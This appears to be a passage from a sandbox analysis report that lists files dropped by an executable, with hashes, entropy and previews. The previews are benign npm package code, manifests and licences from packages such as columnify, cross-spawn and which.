              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):9408
              Entropy (8bit):4.86440488043835
              Encrypted:false
              SSDEEP:
              MD5:87F9020A236DB3C585B8DC902AFD425A
              SHA1:189927A80AEBE71902F225961CCD7B16441B048C
              SHA-256:76B16A8F457C2F63684A1CFC170B219BB6C70D54D8AE6DF78AB2C63C6CA5490D
              SHA-512:3670FC7EF47464992473B6D56049E7A263A1A414156EDA625767250FD56904C09C7BEAE4446BB560412FD50D16E180178FE97469C6E698F3D31257ACA6A04FF2
              Malicious:false
              Reputation:unknown
              Preview:"use strict"..const wcwidth = require('./width').const {. padRight,. padCenter,. padLeft,. splitIntoLines,. splitLongWords,. truncateString.} = require('./utils')..const DEFAULT_HEADING_TRANSFORM = key => key.toUpperCase()..const DEFAULT_DATA_TRANSFORM = (cell, column, index) => cell..const DEFAULTS = Object.freeze({. maxWidth: Infinity,. minWidth: 0,. columnSplitter: ' ',. truncate: false,. truncateMarker: '.',. preserveNewLines: false,. paddingChr: ' ',. showHeaders: true,. headingTransform: DEFAULT_HEADING_TRANSFORM,. dataTransform: DEFAULT_DATA_TRANSFORM.})..module.exports = function(items, options = {}) {.. let columnConfigs = options.config || {}. delete options.config // remove config so doesn't appear on every column... let maxLineWidth = options.maxLineWidth || Infinity. if (maxLineWidth === 'auto') maxLineWidth = process.stdout.columns || Infinity. delete options.maxLineWidth // this is a line control option, don't pass it to column.. // Option default
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1102
              Entropy (8bit):4.647832327179969
              Encrypted:false
              SSDEEP:
              MD5:F8925236995717F77692C528BC0C0797
              SHA1:2CFBE3A16BFEA5927381B82A926376A2AEC4D966
              SHA-256:CDCAFA6178F068D0C572EBD8912FCF7E6DCCDF129807CF32E23274E2B6957E87
              SHA-512:49E891B8046D4DF4655874B9F91E1C7E0CE61E620180D1A86DEE604A79ED20D632BE7CADB07D06CABAA825A420B6A07B6401D655650D48C89B1EFBFF9A2B6730
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "columnify",. "version": "1.6.0",. "description": "Render data in text columns. Supports in-column text-wrap.",. "main": "columnify.js",. "scripts": {. "pretest": "npm prune",. "test": "make prepublish && tape test/*.js | tap-spec",. "bench": "npm test && node bench",. "prepublish": "make prepublish". },. "babel": {. "presets": [. "es2015". ]. },. "author": "Tim Oxley",. "license": "MIT",. "devDependencies": {. "babel-cli": "^6.26.0",. "babel-preset-es2015": "^6.3.13",. "chalk": "^1.1.1",. "tap-spec": "^5.0.0",. "tape": "^4.4.0". },. "repository": {. "type": "git",. "url": "git://github.com/timoxley/columnify.git". },. "keywords": [. "column",. "text",. "ansi",. "console",. "terminal",. "wrap",. "table". ],. "bugs": {. "url": "https://github.com/timoxley/columnify/issues". },. "homepage": "https://github.com/timoxley/columnify",. "engines": {. "node": ">=8.0.0". },. "dependencies": {
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):4868
              Entropy (8bit):4.679076054927397
              Encrypted:false
              SSDEEP:
              MD5:5A7570788ADA0C746B8C5B777BCA0CA5
              SHA1:D9879EA1C8C698F3D50B25865F20284B58E5066B
              SHA-256:7F15B636C9A765AB4D2847033CB6D59D249CA9CBE8D0DF86A42B3C98088B6DE4
              SHA-512:4E9C0323B39A2D88682439FECEB1BC67A7F7241BF02CE9467E7B5A7C025EAABE0840EB48BEFB966AC9257DDDD4520DFC2AE1E87E34488EC30FB49244FE723422
              Malicious:false
              Reputation:unknown
              Preview:"use strict"..var wcwidth = require('./width')../**. * repeat string `str` up to total length of `len`. *. * @param String str string to repeat. * @param Number len total length of output string. */..function repeatString(str, len) {. return Array.apply(null, {length: len + 1}).join(str).slice(0, len).}../**. * Pad `str` up to total length `max` with `chr`.. * If `str` is longer than `max`, padRight will return `str` unaltered.. *. * @param String str string to pad. * @param Number max total length of output string. * @param String chr optional. Character to pad with. default: ' '. * @return String padded str. */..function padRight(str, max, chr) {. str = str != null ? str : ''. str = String(str). var length = max - wcwidth(str). if (length <= 0) return str. return str + repeatString(chr || ' ', length).}../**. * Pad `str` up to total length `max` with `chr`.. * If `str` is longer than `max`, padCenter will return `str` unaltered.. *. * @param String str string to pad. * @param N
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):140
              Entropy (8bit):4.529608569491726
              Encrypted:false
              SSDEEP:
              MD5:668311398574976B850091EB3DECBCF7
              SHA1:48F373DD5AEFC15200455E43BB9914937B0550BA
              SHA-256:71896BE4081D4B40EA406D7E93FEE850B5CE1D8908600802B4C4D4FB2A6469C0
              SHA-512:C332A2550FD1F99300FE049F309158A08B5FD5BA3CED0A5FC14AB50BD6928210CEB65AF864E7E90A458D4E483D67A9ED96CAAE290BC724927401DF052170AE27
              Malicious:false
              Reputation:unknown
              Preview:var stripAnsi = require('strip-ansi').var wcwidth = require('wcwidth')..module.exports = function(str) {. return wcwidth(stripAnsi(str)).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):473
              Entropy (8bit):4.701334553412103
              Encrypted:false
              SSDEEP:
              MD5:B925423B9D36518906CCF8DF27A9B289
              SHA1:8FDFFE34FEDAA3492EC386C4236F6787F5418504
              SHA-256:BCE14984C7D02CEA4E5EDAA60ADDF63F26DD2DDF99CA7AE8072E2C72BF7448BE
              SHA-512:A4AF2C26475D4D7981A41CD78F92184F715DE8274F44C43AB698A3970C2FC6E9C1E470CD0045D16A6AE84DE0B31A67ACAE17B733607FEDF07A728FBD498E8221
              Malicious:false
              Reputation:unknown
              Preview:const {parse, sep, normalize: norm} = require('path')..function* commonArrayMembers (a, b) {. const [l, s] = a.length > b.length ? [a, b] : [b, a]. for (const x of s) {. if (x === l.shift()). yield x. else. break. }.}..const commonAncestorPath = (a, b) => a === b ? a. : parse(a).root !== parse(b).root ? null. : [...commonArrayMembers(norm(a).split(sep), norm(b).split(sep))].join(sep)..module.exports = (...paths) => paths.reduce(commonAncestorPath).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):664
              Entropy (8bit):4.683918865015684
              Encrypted:false
              SSDEEP:
              MD5:B762C7452234B29BA060BB74D335AF83
              SHA1:164A1ACBC7CC3127C78C5DA7B26667BF93B8B8C3
              SHA-256:955A82F4789B3F8F8AE204BBA817F18C7FA732ACA47CEB93538F749890E9DDF3
              SHA-512:3734F3827F228DA8E06991C38645EBCC9065B69A38733A2785CA591100D99217F413AF6DE4A11070FAE1311EE1F28CE4A731091474B1C2A9A3C1913AEA7F3658
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "common-ancestor-path",. "version": "1.0.1",. "files": [. "index.js". ],. "description": "Find the common ancestor of 2 or more paths on Windows or Unix",. "repository": {. "type": "git",. "url": "git+https://github.com/isaacs/common-ancestor-path". },. "author": "Isaac Z. Schlueter <i@izs.me> (https://izs.me)",. "license": "ISC",. "scripts": {. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags". },. "tap": {. "check-coverage": true. },. "devDependencies": {. "require-inject": "^1.4.4",. "tap": "^14.10.7". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1073
              Entropy (8bit):5.050160375695032
              Encrypted:false
              SSDEEP:
              MD5:AEA1CDE69645F4B99BE4FF7CA9ABCCE1
              SHA1:B2E68CE937C1F851926F7E10280CC93221D4F53C
              SHA-256:435A6722C786B0A56FBE7387028F1D9D3F3A2D0FB615BB8FEE118727C3F59B7B
              SHA-512:518113037EE03540CAAE63058A98525F9A4A67425BD8C3596F697BED5AE1D2053FE76F76B85A4EEFB80CC519F7B03D368CF4B445288C4CA7CACB5E7523F33962
              Malicious:false
              Reputation:unknown
              Preview:This software is released under the MIT license:..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.CO
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):171
              Entropy (8bit):4.745476410526044
              Encrypted:false
              SSDEEP:
              MD5:42B2341E75E2E29012793C31222C2783
              SHA1:022A614B8D9F5CCB67B6CE1F478B1EFD7AFF298E
              SHA-256:FFD5FBDAF966B799CD9D046624BE96B48E206920E58AD52D2ED1F2BDD10E93D0
              SHA-512:CBE49B8C2C80D85A4FC3C4D6176554F5C44DF42BDD001C101D886E3C7CCD0095CBD8C97BD01FF78F3CCC459BF668F2FBCB56D2B9CFDF501D39F8D99A162FF699
              Malicious:false
              Reputation:unknown
              Preview:var concatMap = require('../');.var xs = [ 1, 2, 3, 4, 5, 6 ];.var ys = concatMap(xs, function (x) {. return x % 2 ? [ x - 0.1, x, x + 0.1 ] : [];.});.console.dir(ys);.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):345
              Entropy (8bit):4.541477605526791
              Encrypted:false
              SSDEEP:
              MD5:8EF754BA23FDD37B3E8A1C52739ACE80
              SHA1:A3063F014CC693B320DBD64DE3243A79247C1E05
              SHA-256:091B65D778337599D0140B35D53C038603D1732D27C33BFE39E03871A96926B2
              SHA-512:CEC77060F95CD26AA28951DB84745D405CE8A8F45761D2AF11DC602EB75578FDDB3E0D7F45E12D1750A45ADAEC8452B648021773488DC8F49235FC75B819A5B2
              Malicious:false
              Reputation:unknown
              Preview:module.exports = function (xs, fn) {. var res = [];. for (var i = 0; i < xs.length; i++) {. var x = fn(xs[i], i);. if (isArray(x)) res.push.apply(res, x);. else res.push(x);. }. return res;.};..var isArray = Array.isArray || function (xs) {. return Object.prototype.toString.call(xs) === '[object Array]';.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):989
              Entropy (8bit):4.058401565623482
              Encrypted:false
              SSDEEP:
              MD5:85D8A674998927862B17ADEF4AA6A7B1
              SHA1:10E204A14998C9E1D13BBA6AB5243194A94D5D6A
              SHA-256:4FE5E8089B65EBFD55BB86F465BA896BA6A8E24B7B61DE1E0F420F590616B118
              SHA-512:15F5E48798DB291ADAFFF9E804FF0951A5670262BF12E2B243505E9DD64ADE246D6D8C01669FE9B709E018B1444EBF2AEF5190DB248E0D585EA825954CB131D0
              Malicious:false
              Reputation:unknown
              Preview:{. "name" : "concat-map",. "description" : "concatenative mapdashery",. "version" : "0.0.1",. "repository" : {. "type" : "git",. "url" : "git://github.com/substack/node-concat-map.git". },. "main" : "index.js",. "keywords" : [. "concat",. "concatMap",. "map",. "functional",. "higher-order". ],. "directories" : {. "example" : "example",. "test" : "test". },. "scripts" : {. "test" : "tape test/*.js". },. "devDependencies" : {. "tape" : "~2.4.0". },. "license" : "MIT",. "author" : {. "name" : "James Halliday",. "email" : "mail@substack.net",. "url" : "http://substack.net". },. "testling" : {. "files" : "test/*.js",. "browsers" : {. "ie" : [ 6, 7, 8, 9 ],. "ff" : [ 3.5, 10, 15.0 ],. "chrome" : [ 10, 22 ],. "safari" : [ 5.1 ],. "opera" : [ 12 ]. }. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1075
              Entropy (8bit):4.522835462871822
              Encrypted:false
              SSDEEP:
              MD5:A8E1D80E4629945216DE220E4B580CF5
              SHA1:162CCE32C23628192CEF64924A1CE768AF399A4B
              SHA-256:E2A41FAD6A88AFCD0958CB9F93217AC2D62670D2A116AB7DEB2B790E8F9BC90A
              SHA-512:0D06A01E41A7578689629799290CCE3AB910A732D7003675B246C3889995188D40E9B946CA65BD9FDA738F2A8AD5D93327F7208F255BD6F41108EB903EB420D7
              Malicious:false
              Reputation:unknown
              Preview:var concatMap = require('../');.var test = require('tape');..test('empty or not', function (t) {. var xs = [ 1, 2, 3, 4, 5, 6 ];. var ixes = [];. var ys = concatMap(xs, function (x, ix) {. ixes.push(ix);. return x % 2 ? [ x - 0.1, x, x + 0.1 ] : [];. });. t.same(ys, [ 0.9, 1, 1.1, 2.9, 3, 3.1, 4.9, 5, 5.1 ]);. t.same(ixes, [ 0, 1, 2, 3, 4, 5 ]);. t.end();.});..test('always something', function (t) {. var xs = [ 'a', 'b', 'c', 'd' ];. var ys = concatMap(xs, function (x) {. return x === 'b' ? [ 'B', 'B', 'B' ] : [ x ];. });. t.same(ys, [ 'a', 'B', 'B', 'B', 'c', 'd' ]);. t.end();.});..test('scalars', function (t) {. var xs = [ 'a', 'b', 'c', 'd' ];. var ys = concatMap(xs, function (x) {. return x === 'b' ? [ 'B', 'B', 'B' ] : x;. });. t.same(ys, [ 'a', 'B', 'B', 'B', 'c', 'd' ]);. t.end();.});..test('undefs', function (t) {. var xs = [ 'a', 'b', 'c', 'd' ];. var ys = concatMap(xs, function () {});. t.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):751
              Entropy (8bit):5.053913342996983
              Encrypted:false
              SSDEEP:
              MD5:43ABBC6F9093AEA69560715033788727
              SHA1:CE0C4782BDBD720BAF4D2484E5B71728D3A943AF
              SHA-256:AF83B3CE4E592E87B4ECFA8C8CB45BC4EC26D0B3FB8F34F3687088F6928F705F
              SHA-512:467863BDEEEA29FF067FABA6A6A6E70241BEB1ABECF7DE264EBFF36B3A497E4F3E124B180560F7812FE4180447E8045827532332BAE008603B06954CC7681605
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2014, Rebecca Turner <me@re-becca.org>..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF.OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2339
              Entropy (8bit):5.04330747016763
              Encrypted:false
              SSDEEP:
              MD5:8842CEBEB2E33407E9FA47E41DEA0C80
              SHA1:595EC205C05580516996AA88DE64ADC088FDDD66
              SHA-256:FC557C23F6B2EFFEBC75878C7185424B2DD436DF2DF137791FDC6816CEEC0FF2
              SHA-512:CB854AED97B9CDFDBB02B987C29686DCDDA7F5DA4DE7AD3317801961D35A00F1AFA859382528CFEE9D535C004B665E253110F8D81C66D25393169A7DCD43CBD6
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..// These tables borrowed from `ansi`..var prefix = '\x1b['..exports.up = function up (num) {. return prefix + (num || '') + 'A'.}..exports.down = function down (num) {. return prefix + (num || '') + 'B'.}..exports.forward = function forward (num) {. return prefix + (num || '') + 'C'.}..exports.back = function back (num) {. return prefix + (num || '') + 'D'.}..exports.nextLine = function nextLine (num) {. return prefix + (num || '') + 'E'.}..exports.previousLine = function previousLine (num) {. return prefix + (num || '') + 'F'.}..exports.horizontalAbsolute = function horizontalAbsolute (num) {. if (num == null) throw new Error('horizontalAboslute requires a column to position to'). return prefix + num + 'G'.}..exports.eraseData = function eraseData () {. return prefix + 'J'.}..exports.eraseLine = function eraseLine () {. return prefix + 'K'.}..exports.goto = function (x, y) {. return prefix + y + ';' + x + 'H'.}..exports.gotoSOL = function () {. return '\r'.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):791
              Entropy (8bit):4.773262127478753
              Encrypted:false
              SSDEEP:
              MD5:501CC4421445F05407DD447DE932F200
              SHA1:48149FD6456EB7FA73B547C26577132ED9FB15CA
              SHA-256:2DA7C4BB166DFA347305D34EEBAFAEC098A9AFEAAA26E4844736597507DBB968
              SHA-512:DA40F984963D5AD8C338D31B27273F403DDBF64C780ED0DAE697076102F2B928C9243697B5019E8FC0D7C89C8530B5B82F365B213584FDD9B655F8562D9B452E
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "console-control-strings",. "version": "1.1.0",. "description": "A library of cross-platform tested terminal/console command strings for doing things like color and cursor positioning. This is a subset of both ansi and vt100. All control codes included work on both Windows & Unix-like OSes, except where noted.",. "main": "index.js",. "directories": {. "test": "test". },. "scripts": {. "test": "standard && tap test/*.js". },. "repository": {. "type": "git",. "url": "https://github.com/iarna/console-control-strings". },. "keywords": [],. "author": "Rebecca Turner <me@re-becca.org> (http://re-becca.org/)",. "license": "ISC",. "files": [. "LICENSE",. "index.js". ],. "devDependencies": {. "standard": "^7.1.2",. "tap": "^5.7.2". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1105
              Entropy (8bit):5.132342520731707
              Encrypted:false
              SSDEEP:
              MD5:6046FFD2C9EDCD9052BB4DD794D12F95
              SHA1:F8E301FF400E9737F74E9F21BEDA3285AEF077CD
              SHA-256:AAA78451B6FECD1B9C4594C796C133C0E90CAD100372FF8BC6DE615E9EF9ADF1
              SHA-512:B1DC7A59BFF5E641506B63026B3F3FD0706A8FABC47D6A7CB9044F60F17E69BF27FAA3A1D41B0EB53DC9055B56082CDC0C0E419EB80AEDD2F6EFE7020F5F762D
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2018 Made With MOXY Lda <hello@moxy.studio>..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWIS
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1192
              Entropy (8bit):4.704084838246863
              Encrypted:false
              SSDEEP:
              MD5:C34D5F0D4B86A2D1B828F2FB32F353D1
              SHA1:A615672EDB60FE7E09825ABA0828C836E4DD3B82
              SHA-256:B8E01CB18BA87EE1B0E5EB2EB1CE6CBB25A2BDD229F9E08671F8A10ED7E3AD35
              SHA-512:DEDD49C1EBC98A585A1A9D7C58AC4494FB9662CF87B49B69FF29A32F6AF589123A7F012C9C15E89E2334D951BB4F0968AE9EC0F35E832486B07A655CC8B86FCA
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const cp = require('child_process');.const parse = require('./lib/parse');.const enoent = require('./lib/enoent');..function spawn(command, args, options) {. // Parse the arguments. const parsed = parse(command, args, options);.. // Spawn the child process. const spawned = cp.spawn(parsed.command, parsed.args, parsed.options);.. // Hook into child process "exit" event to emit an error if the command. // does not exists, see: https://github.com/IndigoUnited/node-cross-spawn/issues/16. enoent.hookChildProcess(spawned, parsed);.. return spawned;.}..function spawnSync(command, args, options) {. // Parse the arguments. const parsed = parse(command, args, options);.. // Spawn the child process. const result = cp.spawnSync(parsed.command, parsed.args, parsed.options);.. // Analyze if the command does not exist, see: https://github.com/IndigoUnited/node-cross-spawn/issues/16. result.error = result.error || enoent.verifyENOENTSync(result.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1480
              Entropy (8bit):4.705295157173457
              Encrypted:false
              SSDEEP:
              MD5:89585E0499CF3ABBEEB0C7A3892FF95F
              SHA1:B1260D1DA8CDB9402095F6E6C17EBC988D902E70
              SHA-256:0EFF3981C2F85BFAB685C8F104BC910F782FA3547FC96A62AA32EF3F64CA6DF4
              SHA-512:F18EDB66D2F6A32E003A2881D5E21EF7ABB25FF0C09F270AA5F25BFD2F9E6525BEADD5F2E5998CCD6BDCCBEAE0CD3BF5BE16BA534482183410552344A8678A0B
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const isWin = process.platform === 'win32';..function notFoundError(original, syscall) {. return Object.assign(new Error(`${syscall} ${original.command} ENOENT`), {. code: 'ENOENT',. errno: 'ENOENT',. syscall: `${syscall} ${original.command}`,. path: original.command,. spawnargs: original.args,. });.}..function hookChildProcess(cp, parsed) {. if (!isWin) {. return;. }.. const originalEmit = cp.emit;.. cp.emit = function (name, arg1) {. // If emitting "exit" event and exit code is 1, we need to check if. // the command exists and emit an "error" instead. // See https://github.com/IndigoUnited/node-cross-spawn/issues/16. if (name === 'exit') {. const err = verifyENOENT(arg1, parsed, 'spawn');.. if (err) {. return originalEmit.call(cp, 'error', err);. }. }.. return originalEmit.apply(cp, arguments); // eslint-disable-line pref
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3065
              Entropy (8bit):4.688322201121007
              Encrypted:false
              SSDEEP:
              MD5:D4B1240C21C6D584E62BEAB338824852
              SHA1:7C38291B6FA65DAD566ABCA553622681BA64A4B3
              SHA-256:0A67601365A3AE413653C8C9D3C6BFF2202861E1EB8B5D28BF46D4812A4465EA
              SHA-512:602FAD481E86D981B8DDF9FFD491496BF99705D09C2C8509782EBBF0428F4013CF3A9DE0CB67073F08121B2844612F74CD047EFF077E9440DA0A910CB1AEE8F6
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const path = require('path');.const resolveCommand = require('./util/resolveCommand');.const escape = require('./util/escape');.const readShebang = require('./util/readShebang');..const isWin = process.platform === 'win32';.const isExecutableRegExp = /\.(?:com|exe)$/i;.const isCmdShimRegExp = /node_modules[\\/].bin[\\/][^\\/]+\.cmd$/i;..function detectShebang(parsed) {. parsed.file = resolveCommand(parsed);.. const shebang = parsed.file && readShebang(parsed.file);.. if (shebang) {. parsed.args.unshift(parsed.file);. parsed.command = shebang;.. return resolveCommand(parsed);. }.. return parsed.file;.}..function parseNonShell(parsed) {. if (!isWin) {. return parsed;. }.. // Detect & add support for shebangs. const commandFile = detectShebang(parsed);.. // We don't need a shell if the command filename is an executable. const needsShell = !isExecutableRegExp.test(commandFile);.. // If a shell is required, use c
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1172
              Entropy (8bit):4.848454065779841
              Encrypted:false
              SSDEEP:
              MD5:330A3A2BB14EF45CC8CFF24D25ABAAA0
              SHA1:AF9ACD46D821F4320B95BA4D515F8C9740F9F824
              SHA-256:A7B7544B2F8C35510674B9D1B3793D55200FC1EFA65B6099F1932A2950A776A1
              SHA-512:173956B0CF5DA2004C84E12896BA7262A816E7C5D29D63014B3956F5E60E661C397E71D8CF9E64048E144D02D3F1294A9F58688179BF77F3957F6B25B2EBD418
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..// See http://www.robvanderwoude.com/escapechars.php.const metaCharsRegExp = /([()\][%!^"`<>&|;, *?])/g;..function escapeCommand(arg) {. // Escape meta chars. arg = arg.replace(metaCharsRegExp, '^$1');.. return arg;.}..function escapeArgument(arg, doubleEscapeMetaChars) {. // Convert to string. arg = `${arg}`;.. // Algorithm below is based on https://qntm.org/cmd.. // Sequence of backslashes followed by a double quote:. // double up all the backslashes and escape the double quote. arg = arg.replace(/(\\*)"/g, '$1$1\\"');.. // Sequence of backslashes followed by the end of the string. // (which will become a double quote later):. // double up all the backslashes. arg = arg.replace(/(\\*)$/, '$1$1');.. // All other backslashes occur literally.. // Quote the whole thing:. arg = `"${arg}"`;.. // Escape meta chars. arg = arg.replace(metaCharsRegExp, '^$1');.. // Double escape meta chars if necessary. if (doubleEscape
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):549
              Entropy (8bit):4.667899791426931
              Encrypted:false
              SSDEEP:
              MD5:81781C2C9AAB560822D3E10C2859E1F4
              SHA1:13DBBD6FC2CD40D2B1C7417E4D946362EF6D41F6
              SHA-256:B05BA732E167FCF9A4FD67EBB4A5C28CCA4712A36376C0B0F2E4E1D37E7F18D2
              SHA-512:45877768D4AAC0233BEF65C32CBB8CB0D37151A23428F717444B2C2B71B39F1B062522D6FF8A3DC4432E3F63DF66A55AE72957EC5525C89CE10278775F862BCB
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const fs = require('fs');.const shebangCommand = require('shebang-command');..function readShebang(command) {. // Read the first 150 bytes from the file. const size = 150;. const buffer = Buffer.alloc(size);.. let fd;.. try {. fd = fs.openSync(command, 'r');. fs.readSync(fd, buffer, 0, size, 0);. fs.closeSync(fd);. } catch (e) { /* Empty */ }.. // Attempt to extract shebang (null is returned if not a shebang). return shebangCommand(buffer.toString());.}..module.exports = readShebang;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1557
              Entropy (8bit):4.564331134514327
              Encrypted:false
              SSDEEP:
              MD5:1C667F7933C5981D96C7F7367F121EAD
              SHA1:09FEBAD963C1A0905C93F4A7A4E099780847A322
              SHA-256:E525FE739ABA01CF5EEE6473DF449CDDA93DF6266EFFA8EAE0FCFB9A4E6C5DE6
              SHA-512:4FBDA867587B8A6266F811F537A4A378ADC17DD4BFFC3C0F2C64C29E1CE52A0D150DE4FD68956B205E61499CB96A4CA18AC42F495369948804CCCC7CAB13C207
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const path = require('path');.const which = require('which');.const getPathKey = require('path-key');..function resolveCommandAttempt(parsed, withoutPathExt) {. const env = parsed.options.env || process.env;. const cwd = process.cwd();. const hasCustomCwd = parsed.options.cwd != null;. // Worker threads do not have process.chdir(). const shouldSwitchCwd = hasCustomCwd && process.chdir !== undefined && !process.chdir.disabled;.. // If a custom `cwd` was specified, we need to change the process cwd. // because `which` will do stat calls but does not support a custom cwd. if (shouldSwitchCwd) {. try {. process.chdir(parsed.options.cwd);. } catch (err) {. /* Empty */. }. }.. let resolved;.. try {. resolved = which.sync(parsed.command, {. path: env[getPathKey({ env })],. pathExt: withoutPathExt ? path.delimiter : undefined,. });. } catch (e) {. /* Empty */
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1043
              Entropy (8bit):4.7741694083288815
              Encrypted:false
              SSDEEP:
              MD5:6BCB9E5778D80EA1512A98D73D4E3C9A
              SHA1:402837C5BA60F95B309957ADC4657B8FE4FB1F05
              SHA-256:43010039ED5E89F7186960BE682B3CB5CDA5AB6CDFB06CBFD4F081CF0E7B4260
              SHA-512:4548011D1E4ED9F5D7FB5E408476A27B2A19F3BEEC5AC4A9BBDDEBC700A77FF0FB168ECC4917576A18F22D262F82649E9EC0C1242AF752A7CFA0321EA4375AAD
              Malicious:false
              Reputation:unknown
              Preview:{. "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me)",. "name": "which",. "description": "Like which(1) unix command. Find the first instance of an executable in the PATH.",. "version": "2.0.2",. "repository": {. "type": "git",. "url": "git://github.com/isaacs/node-which.git". },. "main": "which.js",. "bin": {. "node-which": "./bin/node-which". },. "license": "ISC",. "dependencies": {. "isexe": "^2.0.0". },. "devDependencies": {. "mkdirp": "^0.5.0",. "rimraf": "^2.6.2",. "tap": "^14.6.9". },. "scripts": {. "test": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "prepublish": "npm run changelog",. "prechangelog": "bash gen-changelog.sh",. "changelog": "git add CHANGELOG.md",. "postchangelog": "git commit -m 'update changelog - '${npm_package_version}",. "postpublish": "git push origin --follow-tags". },. "files": [. "which.js",. "bin/node-which". ],. "tap": {. "check-coverage": true.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1655
              Entropy (8bit):4.791501532348459
              Encrypted:false
              SSDEEP:
              MD5:A8F3FDD9E997785A7B5C4BD987C2516E
              SHA1:004B63F47AA3E8ED948E0B787B6379B58A1AE10B
              SHA-256:8E3E77387B0EFDF22234FD8D56098BB90A0B6F0A00B8A993C1916748E701C8A6
